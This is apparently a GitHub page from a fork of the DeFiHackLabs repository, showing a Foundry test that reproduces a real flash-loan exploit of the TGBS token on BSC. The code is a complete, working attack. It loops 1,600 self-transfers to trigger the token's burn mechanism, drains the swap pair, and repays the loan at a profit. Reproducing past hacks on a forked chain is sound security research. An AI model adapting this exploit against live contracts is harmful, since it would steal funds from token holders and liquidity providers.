forked from SunWeb3Sec/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 0
/
TGBS_exp.sol
110 lines (96 loc) · 3.49 KB
/
TGBS_exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$150K
// Attacker : https://bscscan.com/address/0xff1db040e4f2a44305e28f8de728dabff58f01e1
// Attack Contract : https://bscscan.com/address/0x1a8eb8eca01819b695637c55c1707f9497b51cd9
// Vuln Contract : https://bscscan.com/address/0xedecfa18cae067b2489a2287784a543069f950f4
// Attack Tx : https://phalcon.blocksec.com/explorer/tx/bsc/0xa0408770d158af99a10c60474d6433f4c20f3052e54423f4e590321341d4f2a4
// @Analysis
// https://twitter.com/0xNickLFranklin/status/1765290290083144095
// https://twitter.com/Phalcon_xyz/status/1765285257949974747
interface ITGBS is IERC20 {
function _burnBlock() external view returns (uint256);
}
contract ContractTest is Test {
DVM private constant DPPOracle =
DVM(0x05d968B7101701b6AD5a69D45323746E9a791eB5);
IERC20 private constant WBNB =
IERC20(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c);
ITGBS private constant TGBS =
ITGBS(0xedecfA18CAE067b2489A2287784a543069f950F4);
Uni_Router_V2 private constant Router =
Uni_Router_V2(0x10ED43C718714eb63d5aA57B78B54704E256024E);
function setUp() public {
vm.createSelectFork("bsc", 36725819);
vm.label(address(DPPOracle), "DPPOracle");
vm.label(address(WBNB), "WBNB");
vm.label(address(TGBS), "TGBS");
vm.label(address(Router), "Router");
}
function testExploit() public {
emit log_named_decimal_uint(
"Exploiter WBNB balance before attack",
WBNB.balanceOf(address(this)),
WBNB.decimals()
);
uint256 baseAmount = WBNB.balanceOf(address(DPPOracle));
DPPOracle.flashLoan(
baseAmount,
0,
address(this),
abi.encodePacked(uint32(0))
);
emit log_named_decimal_uint(
"Exploiter WBNB balance after attack",
WBNB.balanceOf(address(this)),
WBNB.decimals()
);
}
function DPPFlashLoanCall(
address sender,
uint256 baseAmount,
uint256 quoteAmount,
bytes calldata data
) external {
WBNB.approve(address(Router), baseAmount);
WBNBToTGBS(baseAmount);
uint256 i;
while (i < 1600) {
TGBS.transfer(address(this), 1);
uint256 burnBlock = TGBS._burnBlock();
// If burn block is not a current block number, the amount of TGBS will be burned in swap pair
if (burnBlock != block.number) {
++i;
}
}
TGBS.approve(address(Router), TGBS.balanceOf(address(this)));
TGBSToWBNB(TGBS.balanceOf(address(this)));
WBNB.transfer(address(DPPOracle), baseAmount);
}
function WBNBToTGBS(uint256 amountIn) private {
address[] memory path = new address[](2);
path[0] = address(WBNB);
path[1] = address(TGBS);
Router.swapExactTokensForTokensSupportingFeeOnTransferTokens(
amountIn,
0,
path,
address(this),
block.timestamp + 10
);
}
function TGBSToWBNB(uint256 amountIn) private {
address[] memory path = new address[](2);
path[0] = address(TGBS);
path[1] = address(WBNB);
Router.swapExactTokensForTokensSupportingFeeOnTransferTokens(
amountIn,
0,
path,
address(this),
block.timestamp + 10
);
}
}